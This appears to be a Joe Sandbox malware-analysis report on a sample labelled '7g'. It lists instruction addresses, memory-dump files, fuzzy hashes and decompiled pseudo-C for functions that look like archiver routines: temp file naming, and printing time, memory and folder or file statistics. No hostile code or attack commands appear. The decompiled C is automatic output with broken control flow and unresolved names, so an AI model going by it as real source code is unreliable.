                                                                                                                    0x00b58b6c
                                                                                                                    0x00b58b6f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58b71
                                                                                                                    0x00b58b71
                                                                                                                    0x00b58b71
                                                                                                                    0x00b58b73
                                                                                                                    0x00b58b75
                                                                                                                    0x00b58b76
                                                                                                                    0x00b58b77
                                                                                                                    0x00b58b77
                                                                                                                    0x00000000
                                                                                                                    0x00b58b71
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58a0b
                                                                                                                    0x00b58a0b
                                                                                                                    0x00b58a0b
                                                                                                                    0x00b58a0c
                                                                                                                    0x00b58a0c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b589fd
                                                                                                                    0x00b589fd
                                                                                                                    0x00b589fd
                                                                                                                    0x00b589fe
                                                                                                                    0x00b589fe
                                                                                                                    0x00000000
                                                                                                                    0x00b589fd
                                                                                                                    0x00b58b3c
                                                                                                                    0x00b58b3f
                                                                                                                    0x00b58b3f
                                                                                                                    0x00b58b42
                                                                                                                    0x00b58b44
                                                                                                                    0x00b58b44
                                                                                                                    0x00000000
                                                                                                                    0x00b58b44
                                                                                                                    0x00b58b16
                                                                                                                    0x00000000
                                                                                                                    0x00b58b16
                                                                                                                    0x00b58b02
                                                                                                                    0x00000000
                                                                                                                    0x00b58b02
                                                                                                                    0x00b58ae3
                                                                                                                    0x00b58ae6
                                                                                                                    0x00b58aed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58af3
                                                                                                                    0x00b58af5
                                                                                                                    0x00000000
                                                                                                                    0x00b58af5
                                                                                                                    0x00b58ac5
                                                                                                                    0x00b58ac8
                                                                                                                    0x00b58acf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58ad8
                                                                                                                    0x00b58adb
                                                                                                                    0x00000000
                                                                                                                    0x00b58adb
                                                                                                                    0x00b58a7a
                                                                                                                    0x00b58a7d
                                                                                                                    0x00b58a84
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58a8a
                                                                                                                    0x00b58a94
                                                                                                                    0x00b58a99
                                                                                                                    0x00b58a9e
                                                                                                                    0x00b58aa4
                                                                                                                    0x00b58aa4
                                                                                                                    0x00b58aa6
                                                                                                                    0x00b58aa8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58aaa
                                                                                                                    0x00b58aad
                                                                                                                    0x00b58aae
                                                                                                                    0x00b58aae
                                                                                                                    0x00b58ab6
                                                                                                                    0x00000000
                                                                                                                    0x00b58ab6
                                                                                                                    0x00b58a56
                                                                                                                    0x00b58a59
                                                                                                                    0x00b58a60
                                                                                                                    0x00b58a68
                                                                                                                    0x00b58a68
                                                                                                                    0x00000000
                                                                                                                    0x00b58a60
                                                                                                                    0x00b58969
                                                                                                                    0x00b5896c
                                                                                                                    0x00b58973
                                                                                                                    0x00b5897b
                                                                                                                    0x00b58980
                                                                                                                    0x00b58983
                                                                                                                    0x00b58986
                                                                                                                    0x00b58988
                                                                                                                    0x00b58990
                                                                                                                    0x00b58997
                                                                                                                    0x00b5899a
                                                                                                                    0x00b5899d
                                                                                                                    0x00b589a1
                                                                                                                    0x00b589ab
                                                                                                                    0x00b589af
                                                                                                                    0x00b589b2
                                                                                                                    0x00b589b5
                                                                                                                    0x00b589b7
                                                                                                                    0x00b589c4
                                                                                                                    0x00b589c4
                                                                                                                    0x00b589c6
                                                                                                                    0x00b589c8
                                                                                                                    0x00b589d5
                                                                                                                    0x00b589d5
                                                                                                                    0x00b589d7
                                                                                                                    0x00b589da
                                                                                                                    0x00b589e2
                                                                                                                    0x00b589e2
                                                                                                                    0x00b589e7
                                                                                                                    0x00b589e7
                                                                                                                    0x00b58988
                                                                                                                    0x00000000
                                                                                                                    0x00b58973
                                                                                                                    0x00b58950
                                                                                                                    0x00b58954
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b588d4
                                                                                                                    0x00b588d9
                                                                                                                    0x00b588de
                                                                                                                    0x00b588e4
                                                                                                                    0x00b588e6
                                                                                                                    0x00b588e9
                                                                                                                    0x00b588f2
                                                                                                                    0x00b588f5
                                                                                                                    0x00b588fb
                                                                                                                    0x00b588fe
                                                                                                                    0x00b58901
                                                                                                                    0x00000000
                                                                                                                    0x00b58903
                                                                                                                    0x00b58903
                                                                                                                    0x00000000
                                                                                                                    0x00b58903
                                                                                                                    0x00b58901
                                                                                                                    0x00b58c33
                                                                                                                    0x00b58c37
                                                                                                                    0x00b58c39
                                                                                                                    0x00b58c3c
                                                                                                                    0x00b58c3e
                                                                                                                    0x00b58c3f
                                                                                                                    0x00b58c47
                                                                                                                    0x00b58c48
                                                                                                                    0x00b58c50
                                                                                                                    0x00b58c51
                                                                                                                    0x00b58c59
                                                                                                                    0x00b58c59
                                                                                                                    0x00b58c5a
                                                                                                                    0x00b58c5a
                                                                                                                    0x00b58c3c
                                                                                                                    0x00000000
                                                                                                                    0x00b58857
                                                                                                                    0x00b58857
                                                                                                                    0x00b58c73
                                                                                                                    0x00b58c77
                                                                                                                    0x00b58c7f
                                                                                                                    0x00b58c7f

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: $ $.$:mem$Delta$LZMA$LZMA2$o
                                                                                                                    • API String ID: 3519838083-3806607069
                                                                                                                    • Opcode ID: 096518ad76e4bffe3ad87e7cb38e83f15bf8c93e524e3edae2586be1a7a7a12e
                                                                                                                    • Instruction ID: d26a85901cae96b054ca03e33206d055937194a24ef01422aafb917915b89c65
                                                                                                                    • Opcode Fuzzy Hash: 096518ad76e4bffe3ad87e7cb38e83f15bf8c93e524e3edae2586be1a7a7a12e
                                                                                                                    • Instruction Fuzzy Hash: 05D1DD31A042598ACF21DFA8C8947EEBBF2FF09305F2441E9D896BB251DB714D09CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1622C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B1622C(intOrPtr __ecx, void* __edx) {
				signed int _t37;
				signed int _t38;
				signed int _t39;
				signed char _t44;
				void* _t46;
				signed int _t52;
				signed char _t53;
				void* _t58;
				void* _t61;
				signed char* _t64;
				unsigned int _t78;
				signed char** _t80;
				unsigned int _t87;
				void* _t89;

				L00B7F140(0xb82e4c, _t89);
				_t61 = __edx;
				 *((intOrPtr*)(_t89 - 0x14)) = __ecx;
				_t37 = GetCurrentThreadId();
				_t38 = GetTickCount();
				_t39 = GetCurrentProcessId();
				_t80 =  *(_t89 + 8);
				_t87 = (_t37 << 0x00000002 ^ _t38) << 0x0000000c ^ _t39;
				 *(_t89 - 0x10) =  *(_t89 - 0x10) & 0x00000000;
				do {
					_t64 = 0;
					_t80[1] = 0;
					 *( *_t80) =  *( *_t80) & 0;
					if(_t61 != 0) {
						_t78 = _t87;
						do {
							_t52 = _t78 & 0x0000000f;
							_t78 = _t78 >> 4;
							if(_t52 >= 0xa) {
								_t53 = _t52 + 0x37;
								__eflags = _t53;
							} else {
								_t53 = _t52 + 0x30;
							}
							 *(_t89 + _t64 - 0x30) = _t53;
							_t64 = _t64 + 1;
						} while (_t64 < 8);
						 *(_t89 + _t64 - 0x30) =  *(_t89 + _t64 - 0x30) & 0x00000000;
						if( *(_t89 + 0xc) != 0) {
							E00B12885();
						}
						E00B12895(_t80, _t89 - 0x30);
						_t58 = GetTickCount() + 2;
						if(_t58 == 0) {
							_t58 = 1;
						}
						_t87 = _t87 + _t58;
					}
					_t101 =  *(_t89 + 0xc);
					_t61 = 1;
					if( *(_t89 + 0xc) != 0) {
						E00B12895(_t80, ".tmp");
					}
					E00B12DD3(_t89 - 0x20,  *((intOrPtr*)(_t89 - 0x14)));
					 *(_t89 - 4) =  *(_t89 - 4) & 0x00000000;
					L00B131AD(_t89 - 0x20,  *_t80);
					if(L00B1707D( *((intOrPtr*)(_t89 - 0x20)), _t101) == 0) {
						__eflags =  *(_t89 + 0xc);
						if( *(_t89 + 0xc) == 0) {
							_t44 = L00B15A99( *((intOrPtr*)(_t89 - 0x20)));
						} else {
							_t44 = L00B17943( *((intOrPtr*)(_t89 - 0x20)), 0);
						}
						__eflags = _t44;
						if(_t44 != 0) {
							E00B11E89(_t44,  *((intOrPtr*)(_t89 - 0x20)));
							_t46 = 1;
						} else {
							_t43 = GetLastError();
							__eflags = _t43 - 0x50;
							if(_t43 == 0x50) {
								goto L22;
							} else {
								__eflags = _t43 - 0xb7;
								if(_t43 != 0xb7) {
									E00B11E89(_t43,  *((intOrPtr*)(_t89 - 0x20)));
									L26:
									_t80[1] = _t80[1] & 0x00000000;
									 *( *_t80) =  *( *_t80) & 0x00000000;
									_t46 = 0;
								} else {
									goto L22;
								}
							}
						}
					} else {
						SetLastError(0xb7);
						goto L22;
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
					return _t46;
					L22:
					 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
					E00B11E89(_t43,  *((intOrPtr*)(_t89 - 0x20)));
					 *(_t89 - 0x10) =  *(_t89 - 0x10) + 1;
				} while ( *(_t89 - 0x10) < 0x64);
				goto L26;
			}

















                                                                                                                    0x00b16231
                                                                                                                    0x00b1623c
                                                                                                                    0x00b1623e
                                                                                                                    0x00b16241
                                                                                                                    0x00b1624c
                                                                                                                    0x00b16257
                                                                                                                    0x00b1625d
                                                                                                                    0x00b16260
                                                                                                                    0x00b16262
                                                                                                                    0x00b16266
                                                                                                                    0x00b16268
                                                                                                                    0x00b1626a
                                                                                                                    0x00b1626d
                                                                                                                    0x00b16271
                                                                                                                    0x00b16273
                                                                                                                    0x00b16275
                                                                                                                    0x00b16277
                                                                                                                    0x00b1627a
                                                                                                                    0x00b16280
                                                                                                                    0x00b16287
                                                                                                                    0x00b16287
                                                                                                                    0x00b16282
                                                                                                                    0x00b16282
                                                                                                                    0x00b16282
                                                                                                                    0x00b1628a
                                                                                                                    0x00b1628e
                                                                                                                    0x00b1628f
                                                                                                                    0x00b16294
                                                                                                                    0x00b1629d
                                                                                                                    0x00b162a1
                                                                                                                    0x00b162a1
                                                                                                                    0x00b162ac
                                                                                                                    0x00b162b8
                                                                                                                    0x00b162b9
                                                                                                                    0x00b162bd
                                                                                                                    0x00b162bd
                                                                                                                    0x00b162be
                                                                                                                    0x00b162be
                                                                                                                    0x00b162c0
                                                                                                                    0x00b162c4
                                                                                                                    0x00b162c6
                                                                                                                    0x00b162cf
                                                                                                                    0x00b162cf
                                                                                                                    0x00b162da
                                                                                                                    0x00b162e1
                                                                                                                    0x00b162e8
                                                                                                                    0x00b162f7
                                                                                                                    0x00b16309
                                                                                                                    0x00b1630b
                                                                                                                    0x00b1631c
                                                                                                                    0x00b1630d
                                                                                                                    0x00b16312
                                                                                                                    0x00b16312
                                                                                                                    0x00b16321
                                                                                                                    0x00b16323
                                                                                                                    0x00b16356
                                                                                                                    0x00b1635c
                                                                                                                    0x00b16325
                                                                                                                    0x00b16325
                                                                                                                    0x00b1632b
                                                                                                                    0x00b1632e
                                                                                                                    0x00000000
                                                                                                                    0x00b16330
                                                                                                                    0x00b16330
                                                                                                                    0x00b16335
                                                                                                                    0x00b16363
                                                                                                                    0x00b16369
                                                                                                                    0x00b1636b
                                                                                                                    0x00b1636f
                                                                                                                    0x00b16372
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b16335
                                                                                                                    0x00b1632e
                                                                                                                    0x00b162f9
                                                                                                                    0x00b162fe
                                                                                                                    0x00000000
                                                                                                                    0x00b162fe
                                                                                                                    0x00b1637a
                                                                                                                    0x00b16382
                                                                                                                    0x00b16337
                                                                                                                    0x00b1633a
                                                                                                                    0x00b1633e
                                                                                                                    0x00b16343
                                                                                                                    0x00b16347
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B16231
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B16241
                                                                                                                    • GetTickCount.KERNEL32 ref: 00B1624C
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00B16257
                                                                                                                    • GetTickCount.KERNEL32 ref: 00B162B1
                                                                                                                    • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 00B162FE
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00B16325
                                                                                                                      • Part of subcall function 00B15A99: __EH_prolog.LIBCMT ref: 00B15A9E
                                                                                                                      • Part of subcall function 00B15A99: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00B15AC0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                                                                                                                    • String ID: .tmp$d
                                                                                                                    • API String ID: 1989517917-2797371523
                                                                                                                    • Opcode ID: 49ebe3744fb6f89178aa5acc2c1586c7074dd49c88ee9fd07d19adc5a27d633b
                                                                                                                    • Instruction ID: 0784620318f588005255579710369d536a96a8d412fb799e677d4a5d51030f78
                                                                                                                    • Opcode Fuzzy Hash: 49ebe3744fb6f89178aa5acc2c1586c7074dd49c88ee9fd07d19adc5a27d633b
                                                                                                                    • Instruction Fuzzy Hash: 30413532914229EBDF14ABA4EC497FCB7F1FF55304F9401A9E812B71A1CB388980DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4AA48 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00B4AA48(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				intOrPtr _v8;
				void* __ecx;
				struct _IO_FILE** _t34;
				struct _IO_FILE** _t42;
				struct _IO_FILE** _t45;
				signed int _t52;
				char* _t56;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t75;
				struct _IO_FILE** _t81;
				intOrPtr _t86;
				void* _t90;
				void* _t91;
				void* _t93;

				_t90 = __eflags;
				_t69 = __edx;
				_push(_t56);
				_push(_t56);
				_t81 =  *0xb9a894; // 0xb9a5b0
				E00B11FE9(_t81);
				fputs(_t56,  *_t81);
				fputs(" Time =",  *_t81);
				_t82 = L00B7F310(_a4, _a8, 0x989680, 0);
				_t58 = 6;
				E00B4A9F8(_t58, 0x20, _t90, _t31, _t69);
				_t34 =  *0xb9a894; // 0xb9a5b0
				fputc(0x2e,  *_t34);
				_t73 = 0x30;
				_t61 = 3;
				E00B4A9F8(_t61, 0x30, _t90, (_a4 - _t82 * 0x989680) / 0x2710, 0);
				_t91 = _a8 - 0x1000000;
				if(_t91 >= 0) {
					if(_t91 > 0) {
						L3:
						_t75 = _a8;
						_t67 = 1;
						_a4 = L00B7F400(_a4, _t67, _t75);
						_a8 = _t75;
						_t73 = _a16;
						_t68 = 1;
						_t52 = L00B7F400(_a12, _t68, _t73);
						_t93 = _a8 - 0x1000000;
						_a12 = _t52;
						_a16 = _t73;
					} else {
						L2:
						if(_a4 > 0) {
							do {
								goto L3;
							} while (_t93 > 0);
							if(_t93 >= 0) {
								goto L2;
							}
						}
					}
				}
				_t86 = 0;
				_t94 = _a12 | _a16;
				_v8 = 0;
				if((_a12 | _a16) != 0) {
					_t86 = L00B7F310(L00B7F440(_a4, _a8, 0x64, 0), _t73, _a12, _a16);
					_v8 = _t73;
				}
				_t42 =  *0xb9a894; // 0xb9a5b0
				fputs(" =",  *_t42);
				_t64 = 5;
				E00B4A9F8(_t64, 0x20, _t94, _t86, _v8);
				_t45 =  *0xb9a894; // 0xb9a5b0
				return fputc(0x25,  *_t45);
			}























                                                                                                                    0x00b4aa48
                                                                                                                    0x00b4aa48
                                                                                                                    0x00b4aa4b
                                                                                                                    0x00b4aa4c
                                                                                                                    0x00b4aa4f
                                                                                                                    0x00b4aa5a
                                                                                                                    0x00b4aa68
                                                                                                                    0x00b4aa71
                                                                                                                    0x00b4aa88
                                                                                                                    0x00b4aa90
                                                                                                                    0x00b4aa93
                                                                                                                    0x00b4aa98
                                                                                                                    0x00b4aaa7
                                                                                                                    0x00b4aabe
                                                                                                                    0x00b4aac3
                                                                                                                    0x00b4aac7
                                                                                                                    0x00b4aad1
                                                                                                                    0x00b4aad4
                                                                                                                    0x00b4aad6
                                                                                                                    0x00b4aade
                                                                                                                    0x00b4aae1
                                                                                                                    0x00b4aae6
                                                                                                                    0x00b4aaec
                                                                                                                    0x00b4aaf4
                                                                                                                    0x00b4aaf7
                                                                                                                    0x00b4aafa
                                                                                                                    0x00b4aafb
                                                                                                                    0x00b4ab00
                                                                                                                    0x00b4ab03
                                                                                                                    0x00b4ab06
                                                                                                                    0x00b4aad8
                                                                                                                    0x00b4aad8
                                                                                                                    0x00b4aadc
                                                                                                                    0x00b4aade
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4ab0b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4ab0b
                                                                                                                    0x00b4aadc
                                                                                                                    0x00b4aad6
                                                                                                                    0x00b4ab10
                                                                                                                    0x00b4ab12
                                                                                                                    0x00b4ab15
                                                                                                                    0x00b4ab18
                                                                                                                    0x00b4ab35
                                                                                                                    0x00b4ab37
                                                                                                                    0x00b4ab37
                                                                                                                    0x00b4ab3a
                                                                                                                    0x00b4ab46
                                                                                                                    0x00b4ab4e
                                                                                                                    0x00b4ab53
                                                                                                                    0x00b4ab58
                                                                                                                    0x00b4ab69

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$fputc$__aulldiv
                                                                                                                    • String ID: Time =$Kernel
                                                                                                                    • API String ID: 3602660170-1750218609
                                                                                                                    • Opcode ID: b823ba7739f4e36a710f7cd5f6377d2427b9b26a8637d77a9ca34e9c00164bd2
                                                                                                                    • Instruction ID: e06f705bf1c2da65fc411c24c362fc45935b6340a75a3a82790522d8fdab5520
                                                                                                                    • Opcode Fuzzy Hash: b823ba7739f4e36a710f7cd5f6377d2427b9b26a8637d77a9ca34e9c00164bd2
                                                                                                                    • Instruction Fuzzy Hash: 6A31E832640204BFEB11EF98DC46F9E37E5EF88710F158066F918AB2D0D6719D50DB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4AB6C Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00B4AB6C(char* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* _t17;
				struct _IO_FILE** _t19;
				int _t22;
				void* _t23;
				struct _IO_FILE** _t24;
				char* _t26;
				void* _t29;
				void* _t30;
				intOrPtr _t39;
				struct _IO_FILE** _t42;
				intOrPtr _t43;
				void* _t48;
				void* _t54;

				_t54 = __eflags;
				L00B7F140(E00B866C0, _t48);
				_t42 =  *0xb9a894; // 0xb9a5b0
				_t26 = __ecx;
				fputs("    ",  *_t42);
				fputs(_t26,  *_t42);
				fputs(" Memory =",  *_t42);
				_t39 =  *((intOrPtr*)(_t48 + 0xc));
				_t43 = 0;
				asm("adc edx, edi");
				_t29 = 0x14;
				_t17 = L00B7F400( *((intOrPtr*)(_t48 + 8)) + 0xfffff, _t29, _t39);
				_push(_t39);
				_push(_t17);
				_t30 = 7;
				E00B4A9F8(_t30, 0x20, _t54);
				_t19 =  *0xb9a894; // 0xb9a5b0
				fputs(" MB",  *_t19);
				E00B126D9(_t48 - 0x18);
				 *((intOrPtr*)(_t48 - 4)) = _t43;
				_t22 = E00B2A099(_t26, _t48 - 0x18, 0x20, _t43);
				if( *((intOrPtr*)(_t48 - 0x14)) != _t43) {
					_t24 =  *0xb9a894; // 0xb9a5b0
					_t22 = fputs( *(_t48 - 0x18),  *_t24);
				}
				_t23 = E00B11E89(_t22,  *(_t48 - 0x18));
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t23;
			}


















                                                                                                                    0x00b4ab6c
                                                                                                                    0x00b4ab71
                                                                                                                    0x00b4ab82
                                                                                                                    0x00b4ab88
                                                                                                                    0x00b4ab91
                                                                                                                    0x00b4ab96
                                                                                                                    0x00b4ab9f
                                                                                                                    0x00b4aba4
                                                                                                                    0x00b4abb1
                                                                                                                    0x00b4abb4
                                                                                                                    0x00b4abb6
                                                                                                                    0x00b4abb7
                                                                                                                    0x00b4abbc
                                                                                                                    0x00b4abbd
                                                                                                                    0x00b4abc2
                                                                                                                    0x00b4abc3
                                                                                                                    0x00b4abc8
                                                                                                                    0x00b4abd4
                                                                                                                    0x00b4abdb
                                                                                                                    0x00b4abe3
                                                                                                                    0x00b4abe6
                                                                                                                    0x00b4abee
                                                                                                                    0x00b4abf0
                                                                                                                    0x00b4abfa
                                                                                                                    0x00b4abfd
                                                                                                                    0x00b4ac01
                                                                                                                    0x00b4ac0d
                                                                                                                    0x00b4ac15

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog
                                                                                                                    • String ID: $ MB$ Memory =
                                                                                                                    • API String ID: 2614055831-2616823926
                                                                                                                    • Opcode ID: 6e4be0a4db1f55acdd80cbba21835b53a501a3c6093f58a9d67b67e3daee9504
                                                                                                                    • Instruction ID: 72b37419a04d5b15d159fb28efa298f8930af5a0950e201bb27e57e759d28361
                                                                                                                    • Opcode Fuzzy Hash: 6e4be0a4db1f55acdd80cbba21835b53a501a3c6093f58a9d67b67e3daee9504
                                                                                                                    • Instruction Fuzzy Hash: E311E332A00205AFDB05BB98DC82EAEBBF5EF84710F204067F504932F1EA755950DF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B46089 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E00B46089(void* __ecx, void* __edx) {
				void* __edi;
				void* _t38;
				signed int _t42;
				signed int _t45;
				void* _t55;
				void* _t59;
				signed int _t67;
				signed int _t70;
				void* _t76;
				void* _t83;
				intOrPtr _t86;
				void* _t88;

				_t76 = __edx;
				L00B7F140(E00B86060, _t88);
				_t83 = __ecx;
				_t59 = __ecx + 8;
				if( *((intOrPtr*)(__ecx + 0xac)) != 0) {
					E00B4B618(_t59, __ecx, 1);
				}
				if( *((char*)(_t83 + 0x139)) != 0) {
					_t95 =  *((intOrPtr*)(_t83 + 0xb8));
					if( *((intOrPtr*)(_t83 + 0xb8)) != 0) {
						_t86 =  *((intOrPtr*)(_t88 + 8));
						_t55 = _t86 + 4;
						_push(_t55);
						L00B4595A(_t83, _t95);
						_push(E00B126D9(_t88 - 0x18));
						_push(1);
						 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
						_push(1);
						_push(_t55);
						_push( *((intOrPtr*)(_t86 + 0x2c)));
						_push( *((intOrPtr*)(_t86 + 0x28)));
						_t38 = L00B45C85(_t83, _t76, _t95);
						 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
						E00B11E89(_t38,  *((intOrPtr*)(_t88 - 0x18)));
						_t56 =  *((intOrPtr*)(_t83 + 0xb8));
						E00B11FE9( *((intOrPtr*)(_t83 + 0xb8)));
						E00B11FE9(_t56);
						if( *((intOrPtr*)(_t86 + 0x18)) != 1 ||  *((intOrPtr*)(_t86 + 0x1c)) != 0 || ( *(_t86 + 0x10) |  *(_t86 + 0x14)) != 0) {
							_t42 =  *(_t86 + 0x10);
							_t67 =  *(_t86 + 0x14);
							_t99 = _t42 | _t67;
							if((_t42 | _t67) != 0) {
								E00B4603E(_t83, _t99, "Folders", _t42, _t67);
							}
							E00B4603E(_t83, _t99, "Files",  *((intOrPtr*)(_t86 + 0x18)),  *((intOrPtr*)(_t86 + 0x1c)));
						}
						E00B4603E(_t83, _t99, "Size",  *((intOrPtr*)(_t86 + 0x28)),  *((intOrPtr*)(_t86 + 0x2c)));
						_t45 =  *(_t86 + 0x20);
						_t70 =  *(_t86 + 0x24);
						_t100 = _t45 | _t70;
						if((_t45 | _t70) != 0) {
							E00B4603E(_t83, _t100, "Alternate streams", _t45, _t70);
							E00B4603E(_t83, _t100, "Alternate streams size",  *((intOrPtr*)(_t86 + 0x30)),  *((intOrPtr*)(_t86 + 0x34)));
						}
						E00B11FE9( *((intOrPtr*)(_t83 + 0xb8)));
						L00B45F3D( *((intOrPtr*)(_t83 + 0xb8)), _t86);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return 0;
			}















                                                                                                                    0x00b46089
                                                                                                                    0x00b4608e
                                                                                                                    0x00b46097
                                                                                                                    0x00b460a0
                                                                                                                    0x00b460a3
                                                                                                                    0x00b460a7
                                                                                                                    0x00b460a7
                                                                                                                    0x00b460b3
                                                                                                                    0x00b460b9
                                                                                                                    0x00b460c0
                                                                                                                    0x00b460c8
                                                                                                                    0x00b460cd
                                                                                                                    0x00b460d0
                                                                                                                    0x00b460d1
                                                                                                                    0x00b460de
                                                                                                                    0x00b460df
                                                                                                                    0x00b460e1
                                                                                                                    0x00b460e5
                                                                                                                    0x00b460e7
                                                                                                                    0x00b460ea
                                                                                                                    0x00b460ed
                                                                                                                    0x00b460f0
                                                                                                                    0x00b460f8
                                                                                                                    0x00b460fc
                                                                                                                    0x00b46101
                                                                                                                    0x00b4610a
                                                                                                                    0x00b46111
                                                                                                                    0x00b4611a
                                                                                                                    0x00b4612a
                                                                                                                    0x00b4612d
                                                                                                                    0x00b46132
                                                                                                                    0x00b46134
                                                                                                                    0x00b4613f
                                                                                                                    0x00b4613f
                                                                                                                    0x00b46151
                                                                                                                    0x00b46151
                                                                                                                    0x00b46163
                                                                                                                    0x00b46168
